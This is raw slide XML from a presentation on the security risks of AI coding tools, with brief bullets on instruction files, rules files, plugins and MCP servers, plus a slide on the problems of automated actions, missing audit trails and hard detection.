              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Skills &amp; Instruction Files</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static text files with no installation medium</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AGENTS.md and CLAUDE.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rules files (editor-level AI behavior)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plugins</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Similar risk profile to MCP servers</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contain MCP servers</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All Configured in user space, outside org control</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5204825" y="1475625"/>
            <a:ext cx="3377100" cy="186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2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="Google Shape;112;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5535425" y="2741425"/>
            <a:ext cx="3283075" cy="2298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6" name="Shape 116"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Problem</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="Google Shape;118;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610825" y="1597200"/>
            <a:ext cx="5853900" cy="3165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2" name="Shape 122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Problem</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="7229400" cy="13248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chemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AI amplifies access</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actions are automated</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No audit trail</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection difficulty</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125" name="Google Shape;125;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2747900" y="2938050"/>
            <a:ext cx="3547336" cy="20802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